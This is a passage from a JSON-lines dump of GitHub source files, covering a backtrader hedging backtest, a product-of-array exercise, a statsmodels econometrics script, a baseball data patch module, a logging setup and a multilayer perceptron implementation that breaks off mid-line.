vix[i]/vix[i-10]-1\r\n \r\n\r\n class Percentile(bt.Indicator):\r\n \r\n lines=('percent',)\r\n \r\n def next(self):\r\n self.lines.percent[0]=percent[0]\r\n \r\n def once(self, start, end):\r\n percent_array = self.lines.percent.array\r\n \r\n for i in range(start, end):\r\n percent_array[i] = percent[i]\r\n \r\n \r\n cerebro = bt.Cerebro(stdstats=False)\r\n cerebro.broker.setcash(cash)\r\n # Set the commission - 0.03% ... divide by 100 to remove the %\r\n cerebro.broker.setcommission(commission=commission_ratio)\r\n # Add a FixedSize sizer according to the stake\r\n# cerebro.addsizer(bt.sizers.FixedSize, stake=1)\r\n \r\n # Add a strategy\r\n if situation==\"backtest\":\r\n cerebro.addstrategy(TestStrategy) \r\n elif situation==\"optimization\":\r\n cerebro.optstrategy(TestStrategy,vixRatio10_buy=[x/10 for x in range(-5,5,1)])\r\n\r\n \r\n # Add the Data Feed to Cerebro \r\n \r\n rawData=pd.read_excel(read_path+name[opt]+'.xlsx')\r\n rawData=rawData.loc[startDate[opt]:'2019',:]\r\n rawData['open.1']=rawData['close.1']\r\n rawData['high.1']=rawData['close.1']\r\n rawData['low.1']=rawData['close.1']\r\n rawData=rawData.dropna()\r\n benchmark=(rawData['close'].diff()/rawData['close'].shift(1)).fillna(0)\r\n benchmark=benchmark.rename('Benchmark')\r\n benchmark.index=benchmark.index.tz_localize('UTC')\r\n \r\n optData=pd.read_excel(read_path+name8[opt]+'.xlsx')\r\n optData.loc[startDate[opt]:'2019',:]\r\n optData.index=pd.to_datetime(optData.index)\r\n optData=optData.dropna()\r\n \r\n tempData=rawData.iloc[:,5:10]\r\n tempData.columns=['open','high','low','close','volume']\r\n data0=bt.feeds.PandasData(dataname=tempData,openinterest=None)\r\n cerebro.adddata(data0,name=name3[opt][1])\r\n \r\n data_range=[range(0,5,5),range(10,len(rawData.columns),5)]\r\n #10,len(rawData.columns),5 for stocks; 0,5,5 for index\r\n \r\n for i in data_range[opt3]:\r\n tempData=rawData.iloc[:,i:i+5]\r\n tempData.columns=['open','high','low','close','volume'] \r\n data=bt.feeds.PandasData(dataname=tempData,openinterest=None)\r\n data.plotinfo.plotmaster=data0\r\n cerebro.adddata(data,name=name5[opt3][opt][count])\r\n count+=1\r\n \r\n count=0\r\n \r\n if opt6:\r\n for i in range(0,len(optData.columns),5):\r\n tempData=np.power(-1,count+1)*optData.iloc[:,i:i+5]\r\n tempData.columns=['open','high','low','close','volume'] \r\n data=bt.feeds.PandasData(dataname=tempData,openinterest=None)\r\n data.plotinfo.plotmaster=data0\r\n cerebro.adddata(data,name=name9[opt][count])\r\n count+=1\r\n \r\n cerebro.addanalyzer(bt.analyzers.PyFolio)\r\n cerebro.addanalyzer(bt.analyzers.SharpeRatio, _name='Sharpe')\r\n cerebro.addanalyzer(bt.analyzers.DrawDown, _name='Drawdown')\r\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name='Trade')\r\n\r\n if situation==\"backtest\":\r\n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\r\n\r\n results=cerebro.run(maxcpus=1)\r\n \r\n if situation==\"backtest\": \r\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue()) \r\n \r\n# cerebro.plot(volume=False)\r\n\r\n if situation==\"backtest\":\r\n\r\n\r\n pyfoliozer = results[0].analyzers.getbyname('pyfolio')\r\n portfolio_rets, positions, transactions, gross_lev = pyfoliozer.get_pf_items()\r\n #utc time\r\n portfolio_rets.index = portfolio_rets.index.tz_convert('UTC')\r\n positions.index = positions.index.tz_convert('UTC')\r\n transactions.index = transactions.index.tz_convert('UTC')\r\n \r\n # pyfolio show\r\n \r\n pf.create_full_tear_sheet(\r\n returns=portfolio_rets,\r\n positions=positions,\r\n transactions=transactions,\r\n # gross_lev=gross_lev,\r\n live_start_date=None, # This date is sample specific\r\n cone_std=(1.0, 1.5, 2.0),\r\n benchmark_rets=benchmark,\r\n bootstrap=False,\r\n turnover_denom='AGB',\r\n header_rows=None)\r\n\r\n elif situation==\"optimization\":\r\n\r\n result = [x[0] for x in results]\r\n \r\n for res in result:\r\n performance.loc[optimize_count,\"n\"]=res.params.vix_lowBound\r\n performance.loc[optimize_count,\"Profit\"]=round(res.analyzers.Trade.\\\r\n get_analysis()[\"pnl\"][\"gross\"]['total'],2)\r\n performance.loc[optimize_count,\"Sharpe Ratio\"]=round(res.analyzers.\\\r\n Sharpe.get_analysis()['sharperatio'],2)\r\n performance.loc[optimize_count,\"Max Drawdown\"]=round(res.analyzers.Drawdown.\\\r\n get_analysis().max.drawdown,2)\r\n performance.loc[optimize_count,\"Trade Num\"]=round(res.analyzers.Trade.\\\r\n get_analysis()['total']['total'],2) \r\n optimize_count+=1\r\n \r\n performance.to_csv(save_path+result_name[opt])\r\n \r\n","repo_name":"CongCao52/reports","sub_path":"Index Options(ETF) Hedging Strategy/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":19475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72625335412","text":"\"\"\"\nGiven an array of integers, return a new array such that each element at index i of the new array\nis the product of all the numbers in the original array except the one at i.\n\"\"\"\n\n\"\"\"\nMittels Division gelöst.\n\"\"\"\ndef produkt(liste):\n neueListe = list()\n ergebnis = 1\n #alle werte multiplizieren\n for i in range(0, len(liste)):\n ergebnis *= liste[i]\n #durch die jeweilige Stelle teilen um i auszuschließen\n for i in range(0, len(liste)):\n neueListe.append(ergebnis // liste[i])\n\n return neueListe\n\n\"\"\"\nBonus: What if you can't use division?\n\"\"\"\ndef ohneDiv(liste):\n neueListe = list()\n ergebnis = 1\n\n for i in range(0, len(liste)):\n #in der zweiten Schleife die eigentliche Rechnung durchführen\n for j in range(0 , len(liste)):\n #Stelle i darf nicht bei sich selbst multipliziert werden\n if j != i:\n ergebnis *= liste[j]\n else:\n continue\n neueListe.append(ergebnis)\n #ergebnis wieder zurücksetzen damit jede Stelle neu ausgerechnet werden kann\n ergebnis = 1\n\n return neueListe\n\nif __name__ == \"__main__\":\n #beispielarray\n array = [1,2,3,4,5]\n\n print(produkt(array))\n print(ohneDiv(array))","repo_name":"LennartPaciner/python-stuff","sub_path":"Exercises/Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71342050293","text":"import wooldridge\nimport statsmodels.api as sm\nimport numpy as np\nimport pandas as pd\n\n# c1\ndf = wooldridge.dataWoo('VOTE1')\n'''y = df['voteA']\nX = pd.DataFrame([np.log(df['expendA']), np.log(df['expendB']), np.log(df['prtystrA'])]).T\nX = sm.add_constant(X)\nmodel = sm.OLS(y, X).fit()'''\nmodel = sm.formula.ols(formula='voteA ~ np.log(expendA) + np.log(expendB) + np.log(prtystrA)', data=df).fit()\nprint(model.summary)\n\n# c6\ndf = wooldridge.dataWoo('WAGE2')\nmodel = sm.formula.ols(formula='np.log(wage) ~ educ + exper +tenure', data=df).fit()\nprint(model.summary)\nf_test = model.f_test('educ=exper')\nprint(f_test)\n\n# c8\ndf = wooldridge.dataWoo('401KSUBS')\ndf = df[df['fsize'] == 1]\nmodel = sm.formula.ols('nettfa ~ inc + age', data=df).fit()\nf_test = model.f_test('age = 1')\n","repo_name":"dy0703/pycharm","sub_path":"Data Analysis/Econometric/Chap_4(Multiple regression analysis Inference.py","file_name":"Chap_4(Multiple regression analysis Inference.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13415794445","text":"from dataclasses import dataclass, field\nfrom datetime import datetime\n\nimport vigorish.database as db\nfrom vigorish.enums import DataSet\nfrom vigorish.patch.base import Patch, PatchList\nfrom vigorish.util.dt_format_strings import DATE_ONLY\nfrom vigorish.util.result import Result\n\n\n@dataclass\nclass BrooksGamesForDatePatchList(PatchList):\n @property\n def game_date(self):\n return datetime.strptime(self.url_id, DATE_ONLY) if self.url_id else None\n\n def __post_init__(self):\n self.data_set = DataSet.BROOKS_GAMES_FOR_DATE\n self.patch_list_id = \"__brooks_games_for_date_patch_list__\"\n\n def apply(self, data, db_session):\n for patch in self.patch_list:\n data = patch.apply(data)\n patch.apply_to_database(data, db_session)\n return Result.Ok(data)\n\n\n@dataclass\nclass PatchBrooksGamesForDateBBRefGameID(Patch):\n game_date: str = field(repr=False)\n invalid_bbref_game_id: str\n valid_bbref_game_id: str\n\n def __post_init__(self):\n self.data_set = DataSet.BROOKS_GAMES_FOR_DATE\n self.patch_id = \"__patch_brooks_games_for_date_bbref_game_id__\"\n\n def apply(self, data):\n if self.invalid_bbref_game_id in data.all_bbref_game_ids:\n for game_info in data.games:\n if game_info.bbref_game_id == self.invalid_bbref_game_id:\n game_info.bbref_game_id = self.valid_bbref_game_id\n break\n return data\n\n def apply_to_database(self, data, db_session):\n delete_pitchfx_with_invalid_id(db_session, self.invalid_bbref_game_id)\n delete_pitch_apps_with_invalid_id(db_session, self.invalid_bbref_game_id)\n delete_game_status(db_session, self.invalid_bbref_game_id)\n update_game_status(db_session, data, self.valid_bbref_game_id)\n db_session.commit()\n\n\n@dataclass\nclass PatchBrooksGamesForDateRemoveGame(Patch):\n game_date: str = field(repr=False)\n remove_bbref_game_id: str\n\n def __post_init__(self):\n self.data_set = DataSet.BROOKS_GAMES_FOR_DATE\n self.patch_id = \"__patch_brooks_games_for_date_remove_game__\"\n\n def apply(self, data):\n data.games = list(filter(lambda x: x.bbref_game_id != self.remove_bbref_game_id, data.games))\n data.game_count = len(data.games)\n return data\n\n def apply_to_database(self, data, db_session):\n delete_pitchfx_with_invalid_id(db_session, self.remove_bbref_game_id)\n delete_pitch_apps_with_invalid_id(db_session, self.remove_bbref_game_id)\n delete_game_status(db_session, self.remove_bbref_game_id)\n update_date_status(db_session, data)\n db_session.commit()\n\n\ndef delete_pitchfx_with_invalid_id(db_session, bbref_game_id):\n all_pfx_with_invalid_id = db_session.query(db.PitchFx).filter_by(bbref_game_id=bbref_game_id).all()\n for pfx in all_pfx_with_invalid_id:\n db_session.delete(pfx)\n\n\ndef delete_pitch_apps_with_invalid_id(db_session, bbref_game_id):\n all_pitch_apps_with_invalid_id = (\n db_session.query(db.PitchAppScrapeStatus).filter_by(bbref_game_id=bbref_game_id).all()\n )\n for pitch_app in all_pitch_apps_with_invalid_id:\n db_session.delete(pitch_app)\n\n\ndef delete_game_status(db_session, bbref_game_id):\n game_status = db.GameScrapeStatus.find_by_bbref_game_id(db_session, bbref_game_id)\n if game_status:\n db_session.delete(game_status)\n\n\ndef update_game_status(db_session, data, bbref_game_id):\n game_status = db.GameScrapeStatus.find_by_bbref_game_id(db_session, bbref_game_id)\n if game_status:\n for game_info in data.games:\n if game_info.bbref_game_id == bbref_game_id:\n game_status.bb_game_id = game_info.bb_game_id\n game_status.game_time_hour = game_info.game_time_hour\n game_status.game_time_minute = game_info.game_time_minute\n game_status.game_time_zone = game_info.time_zone_name\n game_status.pitch_app_count_brooks = game_info.pitcher_appearance_count\n break\n\n\ndef update_date_status(db_session, data):\n date_status = db.DateScrapeStatus.find_by_date(db_session, data.game_date)\n date_status.game_count_brooks = data.game_count\n","repo_name":"a-luna/vigorish","sub_path":"src/vigorish/patch/brooks_games_for_date.py","file_name":"brooks_games_for_date.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"39353223499","text":"import os\nimport sys\nimport logging\n\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s: %(message)s]\"\nlog_dir = \"logs\"\nlog_filepath = os.path.join(log_dir, \"running_logs.log\")\nos.makedirs(log_dir, exist_ok=True)\n\n# overwrite logging.basicConfig for our custom logging configuration\nlogging.basicConfig(\n level=logging.INFO,\n format=logging_str,\n \n handlers=[\n logging.FileHandler(log_filepath), # store logs in logging files\n logging.StreamHandler(sys.stdout), # show logs in terminal\n ]\n)\n\nlogger = logging.getLogger(\"textSummarizerLogger\")","repo_name":"phiisonfire/text-summarizer","sub_path":"src/textSummarizer/logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18778642826","text":"import matplotlib.pyplot as plt\nfrom itertools import product as cartesian_product\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport sympy as sm\nimport numpy as np\nimport os\n\nclass Perceptron:\n \"\"\"\n Class that represents a multi layer perceptron\n ...\n\n Atributos\n ----------\n X_train : np.array\n Numpy matrix (N x K) of the training data, N is the number of datapoints and K is the number of features\n Y_train : N x M\n Numpy matrix (N x M) of the outputs of the training data, N is the number of datapoints and M is the number of outputs\n X_validation : [int]\n Numpy matrix (Nv x K) of the training data, Nv is the number of datapoints and K is the number of features\n Y_validation : [int]\n Numpy matrix (Nv x M) of the outputs of the validation data, Nv is the number of datapoints and M is the number of outputs\n X_test: [int]\n Numpy matrix (Nt x K) of the training data, Nt is the number of datapoints and K is the number of features\n hl : int\n Number of hidden layers\n hn : int\n Number of neurons per hidden layer\n \"\"\"\n \n def __init__(self, X_train, Y_train, X_validation, Y_validation, X_test, hl, hn):\n\n # initialize parameters receibed\n\n self.hl = hl\n self.hn = hn\n\n self.X_validation = X_validation\n self.Y_validation = Y_validation\n self.X_test = X_test\n\n self.X_train = X_train\n self.Y_train = Y_train\n self.Y_dtrain = sm.Matrix(Y_train).T\n \n self.n_dim = X_train.shape[1]\n self.N = X_train.shape[0]\n self.inputs = self.n_dim\n self.M = self.Y_dtrain.shape[0]\n self.Yd_train = np.reshape(Y_train,(self.N,self.M))\n self.model_name = f\"MLP hl = {hl} hn= {hn}\"\n\n # Iniitialize neuron and layer numbers\n self.neurons_input = self.inputs\n self.layers_hidden = hl\n self.neurons_hidden = [hn] * hl\n self.outputs = self.M\n self.weights_dimensions = [self.inputs ,self.neurons_input] + self.neurons_hidden + [self.outputs]\n self.neurons_numbers = [self.neurons_input] + self.neurons_hidden + [self.outputs]\n self.n_layers = self.layers_hidden + 2\n\n # Compute the number of weights per layer and the total number of weights in the network\n\n num_weights_layer = []\n for l in range(self.n_layers):\n num_weights_layer.append(self.weights_dimensions[l]*self.weights_dimensions[l+1])\n self.num_weights_layer = num_weights_layer\n self.num_weights = sum(num_weights_layer)\n\n # Name each layer to label plots\n\n self.name_layers()\n\n # Initialize lists to save results\n\n self.validation_errors =[]\n self.validation_avg_energy_errors=[]\n self.validation_local_gradients=[]\n self.validation_delta_ks =[]\n\n\n def name_layers(self):\n \"\"\"\n Auxiliar function that initializes a list with names for the layers\n \"\"\"\n self.layer_names = []\n for l in range(self.n_layers):\n type_layer = ''\n if l == 0:\n type_layer = 'input'\n elif l == self.n_layers-1:\n type_layer = 'output'\n else:\n type_layer = 'hidden'\n l_name = f\"{type_layer} layer\"\n if type_layer == 'hidden': \n l_name = l_name + str(l)\n self.layer_names.append(l_name)\n\n def get_energy(self,e_vector):\n \"\"\"Function that returns the instantaneous energy error\n\n Parameters\n ----------\n e_vector : numpy ndarray\n Error matrix \n \n Returns\n ----------\n int: intantaneous energy error\n \n \"\"\"\n return 0.5 * (sum(e_vector**2))\n\n def forward(self, x, weights):\n \"\"\" Function that performs a forward step.\n It calculates the local field and the activation value and propagates forward\n\n Parameters\n ----------\n X : numpy ndarray\n Input matrix\n weights: numpy ndarray\n Weights matrix \n\n Returns\n ----------\n Y: numpy ndarray of outputs of the last layer\n Yi: numpy ndarray of outputs of each layer\n Vi: numpy ndarray of local fields of each layer\n impulses: numpy ndarray of inputs of each layer\n \"\"\" \n Vi = []\n phi_i_v_i = x\n Yi = []\n for i in range(self.n_layers):\n wi = weights[i]\n vi = np.dot(phi_i_v_i,wi)\n Vi.append(vi)\n phi_i_v_i = self.num_phi(vi,i)\n Yi.append(phi_i_v_i)\n Y = Yi[-1]\n impulses = [x] + Yi\n return Y, Vi, Yi, impulses\n \n\n def num_phi(self, x, layer):\n \"\"\" Activation function\n It returns the layer's activation function applied to a specific value\n Parameters\n ----------\n X : numpy ndarray\n argument to aply the activation function to\n layer: int\n number of layer\n Returns\n ----------\n The layer's activation function applied to x\n \"\"\" \n if layer == 0:\n return 1 / (1 + np.exp(-x))\n elif layer == self.n_layers -1:\n return 1 / (1 + np.exp(-x))\n else:\n return 1 / (1 + np.exp(-x))\n\n\n def num_dphi(self, x, layer):\n \"\"\" Derivative of activation function\n It returns the derivative of the layer's activation function applied to a specific value\n\n Parameters\n ----------\n X : numpy ndarray\n argument to aply the derivative of the activation function to\n layer: int\n number of layer\n \n Returns\n ----------\n The derivative of the layer's activation function applied to x\n \"\"\" \n if layer == 0:\n return x * (1 - x)\n elif layer == self.n_layers -1:\n return x * (1 - x)\n else:\n return x * (1 - x)\n\n\n\n def gradient_descent(self, initial_values,epochs, eta, tol = 0.01):\n \"\"\" Function that implements the gradient descent algorithm\n\n Parameters\n ----------\n initial values : [numpy ndarray]\n list of weight matrices (one per layer)\n epochs: int\n maximum epochs\n eta: float\n learning rate\n tol: float\n tolerance for stopping condition\n \n \"\"\" \n self.model_name = self.model_name + f' eta = {eta}'\n self.epochs = epochs\n \n assert len(initial_values) == self.n_layers, \"not enough initial weight matrices were passed\"\n energy_errors_av = []\n errors = []\n param_values = [np.zeros((self.epochs,self.num_weights_layer[l])) for l in range(self.n_layers)]\n dif_values = [np.zeros((self.epochs,self.num_weights_layer[l])) for l in range(self.n_layers)]\n local_grad_values = [np.zeros((self.epochs, 1)) for i in range(self.n_layers)]\n mean_delta_k_output = []\n \n error_it = 10000\n it = 0\n W = initial_values\n\n while it < epochs and error_it > tol:\n # forward\n Y, Vi, Yi, impulses = self.forward(self.X_train,W)\n local_gradients_it = []\n # batch back propagation starting from the output layer\n for layer in range(self.n_layers-1,-1,-1): \n if layer == self.n_layers -1:\n d = self.Yd_train\n error = d-Y\n energy = self.get_energy(error)\n avg_energy_error_it = np.mean(energy)\n errors = np.append(errors,error)\n energy_errors_av = np.append(energy_errors_av,avg_energy_error_it)\n else:\n wi = W[layer+1]\n error = np.dot(delta_k,wi.T)\n dphi_vi = self.num_dphi(Yi[layer], layer)\n delta_k = error * dphi_vi\n local_gradients_it.append(delta_k)\n if layer == self.n_layers - 1:\n mean_delta_k_output = np.append(mean_delta_k_output,np.mean(delta_k))\n local_grad_values[layer][it] = np.mean(delta_k)\n \n # update_weights\n for layer in range(self.n_layers):\n index = self.n_layers - 1- layer\n impulse = impulses[layer]\n delta_k = local_gradients_it[index]\n \n dJdw = impulse.T.dot(delta_k)\n W[layer] = W[layer] + eta*dJdw\n param_values[layer][it,:] = W[layer].flatten().tolist()\n\n self.validation(W) \n\n it+=1\n \n\n self.param_values = param_values\n self.dif_values = dif_values\n self.local_gradients_array = local_grad_values\n\n self.errors = errors\n self.avg_energy_errors_training = energy_errors_av\n self.training_weights = W\n self.mean_delta_k_output = mean_delta_k_output\n\n def validation(self, W):\n \"\"\" Function that finds the predicted output on the validation set,\n it also finds one gradient to test the behaviour on the validation set.\n Training does not occur here, the model does not learn from the validation set\n\n Parameters\n ----------\n W : [numpy ndarray]\n weight matrix \n \"\"\" \n N_validation = self.Y_validation.shape[0]\n Y_validation = np.reshape(self.Y_validation,(N_validation,self.M))\n #foward\n Y, Vi, Yi, impulses = self.forward(self.X_validation,W)\n #backward to find error and local gradient\n layer = self.n_layers - 1\n validation_error = Y_validation -Y \n instantaneous_energy = 0.5 * (sum(validation_error**2))\n av_error = np.mean(instantaneous_energy)\n delta_k = validation_error * self.num_dphi(Y,layer)\n mean_delta_k = np.mean(delta_k)\n\n self.validation_errors = np.append(self.validation_errors,validation_error)\n self.validation_avg_energy_errors = np.append(self.validation_avg_energy_errors, av_error)\n self.validation_local_gradients = np.append(self.validation_local_gradients, delta_k)\n self.validation_delta_ks = np.append(self.validation_delta_ks, mean_delta_k)\n\n def test(self, X_test):\n \"\"\" Fucntion that finds the predicted output on the test set\n Parameters\n ----------\n X_test : [numpy ndarray]\n Matrix of testing data\n \"\"\" \n Y, _,_,_ = self.forward(X_test,self.training_weights)\n self.Y_hat_test = Y\n\n def final_validate(self):\n \"\"\" Function that finds the predicted output on the validation set\n \"\"\" \n Y, _,_,_ = self.forward(self.X_validation,self.training_weights)\n self.y_hat_val = Y\n \n\n def graph(self):\n \"\"\" Auxiliary function to call other methods and generate graphs \"\"\" \n self.graph_errors()\n self.graph_gradients()\n \n def graph_gradients(self):\n \"\"\" Auxiliary function to graph local gradients \"\"\" \n assert len(self.local_gradients_array) == self.n_layers\n grads_array = np.hstack(self.local_gradients_array)\n df_grads = [pd.DataFrame(grads_array,columns=self.layer_names)]\n\n title = [r'Average local gradient $\\delta_k$']\n filepath = f'Results/Training/Gradients {self.model_name}.jpg'\n x_label = ['epoch']\n y_label = [r'$\\delta_k$']\n self.graph_dfs(df_grads, title,x_label, y_label,filepath)\n \n def graph_dfs(self, df_list,titles,x_labels, y_labels,filepath, size= (5,5)):\n \"\"\" Auxiliary function to graph multiple dataframes\n\n Parameters\n ----------\n df_list : [df]\n List of dataframes to plot\n titles: [str]\n list of titles\n x_labels: [str]\n list of labels along the x axis\n y_labels: [str]\n list of labels along the y axis\n filepath: str\n filepath to save the image\n size: (float,float)\n size of the image\n \"\"\" \n num_dfs = len(df_list)\n fig, ax = plt.subplots(num_dfs,1,figsize=size,sharex=True)\n if num_dfs == 1:\n df = df_list[0]\n df.plot(marker=\".\",rot=45,ax=ax,legend=True, title= titles[0])\n ax.set_xlabel(x_labels[0])\n ax.set_ylabel(y_labels[0])\n\n fig.tight_layout()\n plt.savefig(filepath,bbox_inches='tight')\n plt.close()\n else:\n for l in range(num_dfs):\n df = df_list[l]\n df.plot(marker=\".\",rot=45,ax=ax[l],legend=False, title= titles[l])\n ax[l].set_xlabel(x_labels[l])\n ax[l].set_ylabel(y_labels[l])\n lines0, labels0 = [sum(x, []) for x in zip(*[ax[l].get_legend_handles_labels()])]\n \n fig.tight_layout()\n plt.savefig(filepath)\n plt.close()\n\n def graph_errors(self):\n \"\"\" Auxiliary function to graph errors \"\"\" \n df_av_instantaneous_energy = [pd.DataFrame(self.avg_energy_errors_training,columns=['$\\mathcal{E}_{av}$'])]\n title = ['Average Instantaneous energy error $\\mathcal{E}_{av}$']\n filepath = f'Results/Training/Errors {self.model_name}.jpg'\n x_label = ['epoch']\n y_label = ['$\\mathcal{E}_{av}$']\n self.graph_dfs(df_av_instantaneous_energy, title,x_label, y_label,filepath)\n \n def save_results(self, list_dics, max_epochs,eta):\n \"\"\" Auxiliary function to run training, validation and testing and \n save relevant results of the model to a list of dictionaries\n \n Parameters\n ----------\n list_dics : [dict]\n List of dictionaries were the results of the model will be saved\n max_epochs: int\n maximum number of epochs\n eta: float\n learning rate\n \n \"\"\" \n self.initialize_gradient_descent(max_epochs,eta)\n self.test(self.X_test)\n self.final_validate()\n self.graph()\n \n list_dics[0][self.model_name] = self.avg_energy_errors_training\n list_dics[1][self.model_name] = self.validation_avg_energy_errors\n list_dics[2][self.model_name] = self.mean_delta_k_output\n list_dics[3][self.model_name] = self.validation_delta_ks\n list_dics[4][self.model_name] = self.Y_hat_test\n list_dics[5][self.model_name] = self.validation_avg_energy_errors[-1]\n list_dics[6][self.model_name] = self.num_weights\n list_dics[7][self.model_name] = self.y_hat_val\n \n\n\n def initialize_gradient_descent(self,epochs,eta):\n \"\"\" Auxiliary function to initialize weights in the hyercube [-1,1]\n and initialize gradient descent\n \n Parameters\n ----------\n list_dics : [dict]\n List of dictionaries were the results of the model will be saved\n max_epochs: int\n maximum number of epochs\n eta: float\n learning rate\n \"\"\" \n initial_values = []\n for i in range(self.n_layers):\n sizei = (self.weights_dimensions[i], self.weights_dimensions[i+1])\n wi = np.random.uniform(low=-1, high=1,size=sizei)\n assert self.num_weights_layer[i] == wi.shape[0]*wi.shape[1]\n initial_values.append(wi)\n self.gradient_descent(initial_values, epochs, eta)\n\n\nclass Comparison:\n \"\"\"\n Class to compare different multi layer perceptrons\n ...\n\n Attributes\n ----------\n data : np.array\n Numpy array (N x M) of the entire data set\n Xindex : [int]\n List of indices of the columns of the features or independent variables\n Yindex : [int]\n List of indices of the columns of the outputs or dependent variables\n hl_max : float\n maximum number of hidden layers, we iterate from 1 to hl_max\n hn_max: float\n maximum number of neurons per hidden layer, we iterate from 1 to hn_max\n max_epochs : int\n maximum number of epochs for the training\n seed : int\n seed for the random number generator\n \"\"\"\n \n def __init__(self,data, Xindex, Yindex, hl_max, hn_max, etas, max_epochs, seed = None):\n\n self.data = data\n self.Xindex = Xindex\n self.Yindex = Yindex\n\n\n self.hl_max = hl_max\n self.hn_max = hn_max\n self.etas = etas\n self.max_epochs = max_epochs\n\n if seed is None:\n self.seed = int(np.pi*10**9)\n\n \n\n self.create_paths(['Results', 'Results/Training', 'Results/Validation', 'Results/Test', 'Results/csv'])\n\n np.random.seed(self.seed)\n\n self.normalize()\n self.random_sample()\n\n self.global_args = (\n self.X_train,\n self.Y_train,\n self.X_validation,\n self.Y_validation,\n self.X_test\n )\n \n list_hn = list(range(1,hn_max+1))\n mlp_params_list = [etas,list_hn]\n self.mlp_params_combinations = list(cartesian_product(*mlp_params_list))\n\n\n self.results = {}\n self.save_models_results()\n self.plot_results()\n \n\n def normalize(self):\n \"\"\"Function to normalize the data between 0 and 1\"\"\"\n self.norm_data = (self.data - np.min(self.data, axis=0)) / (np.max(self.data, axis=0) - np.min(self.data, axis=0))\n\n \n def random_sample(self):\n \"\"\"Function to randomly sample the data and split the data set into training, validation and test sets\"\"\"\n indices = np.arange(self.norm_data.shape[0])\n (\n data_train,\n data_tv,\n self.indices_train,\n indices_tv,\n ) = train_test_split(self.norm_data, indices, test_size=0.4, random_state=self.seed)\n indices_in_tv = np.arange(data_tv.shape[0])\n (\n data_test,\n data_validation,\n indices_test_in_tv,\n indices_val_in_tv,\n ) = train_test_split(data_tv, indices_in_tv, test_size=0.5, random_state=self.seed)\n\n self.index_test = indices_tv[indices_test_in_tv]\n self.indices_val = indices_tv[indices_val_in_tv] \n\n self.X_train = data_train[:, self.Xindex]\n self.Y_train = data_train[:, self.Yindex]\n\n self.X_test = data_test[:, self.Xindex]\n self.Y_test = data_test[:, self.Yindex]\n \n self.X_validation = data_validation[:, self.Xindex]\n self.Y_validation = data_validation[:, self.Yindex]\n\n self.Y_test = self.Y_test.reshape(-1,1)\n\n self.Y_train_sorted = self.X_train[np.argsort(self.indices_train)]\n self.Y_train_sorted = self.Y_train[np.argsort(self.indices_train)]\n\n self.X_test_sorted = self.X_test[np.argsort(self.index_test)]\n self.Y_test_sorted = self.Y_test[np.argsort(self.index_test)]\n\n self.X_validation_sorted = self.X_validation[np.argsort(self.indices_val)]\n self.Y_validation_sorted = self.Y_validation[np.argsort(self.indices_val)]\n\n \n def save_models_results(self):\n \"\"\" Function to save the results of the models in a dictionary\"\"\"\n for hl in range(1, self.hl_max + 1):\n results_dics = [{} for i in range(8)]\n\n for (lr,hn) in self.mlp_params_combinations:\n args = self.global_args + (hl,hn)\n mlp = Perceptron(*args)\n mlp.save_results(results_dics, self.max_epochs,lr)\n self.results[str(hl)] = results_dics\n\n def plot_comparison(self,data,indexes, label_names, title, x_label, y_label, filepath, size, plot_pred = False, obs=None):\n \"\"\" Function to plot comparisons between models\n Parameters\n ----------\n data : dict\n Dictionary with the data to plot, the dictionary contains the name of the model as key and the predicted values as values\n indexes : [str]\n List of the names of the models to plot\n label_names : [str]\n List of the labels of the models to plot (best, avg, worst for example)\n title : str\n Title of the plot\n x_label : str\n Label of the x axis\n y_label : str\n Label of the y axis\n filepath : str\n Path to save the image of the plot\n size : tuple\n Size of the plot\n plot_pred : bool\n Boolean that signifies if the plot is of the predictions or not\n obs : np.array\n Array of the observed values, only used if plot_pred is True\n \"\"\"\n fig, ax = plt.subplots(1,1,figsize=size,sharex=True) \n if plot_pred:\n ax.plot(obs, \".-\", label=\"Observations\")\n print(\"plotting obs\")\n for label_name, index in zip(label_names,indexes):\n label_i = f\"{index} ({label_name})\"\n ax.plot(data[index], \".-\", label=label_i)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n ax.legend(framealpha=1)\n # fig.tight_layout()\n fig.suptitle(title)\n plt.savefig(filepath, bbox_inches='tight')\n plt.close()\n \n def set_params(self,type_plot, stage, name):\n \"\"\" Function to set the parameters of the plot\n Parameters\n ----------\n type_plot : str\n Type of plot to make, can be 'error', 'local_grad' or 'pred'\n stage : str\n Stage of the data to plot, can be 'training', 'validation' or 'test'\n name : str\n name of the model\n Returns\n -------\n plot_title : str\n Title of the plot\n x_label : str\n Label of the x axis\n y_label : str\n Label of the y axis\n filepath : str\n Path to save the image of the plot\n \"\"\"\n \n if type_plot == 'error':\n x_label = \"epochs\"\n y_label = r\"$\\mathcal{E}_{av}$\"\n fig_title = 'Energy error'\n if name:\n plot_title = r\"$\\mathcal{E}_{av}$\" + f\" ({stage})\"\n elif type_plot == 'local_grad':\n x_label = \"epochs\"\n y_label = r\"$\\delta_k$\"\n fig_title = \"Local output gradients\"\n plot_title = r\"Avg $\\delta_k$\" + f\" ({stage})\"\n else:\n x_label = \"p\"\n y_label = \"Y\"\n fig_title = \"Pred vs obs\"\n plot_title = f\"Comparison of predicted and observed values\"\n file_path = f\"Results/{stage}/{fig_title} in {stage}\" \n if name is not None:\n hl = name[-1]\n plot_title = plot_title + f\"with {hl} hidden layer(s)\"\n file_path = file_path + f\" hl={hl}.png\"\n return plot_title, x_label, y_label, file_path\n\n \n def sort_by_value(self,dic):\n \"\"\" FUnciton to sort a dictionary by its values\"\"\"\n return dict(sorted(dic.items(), 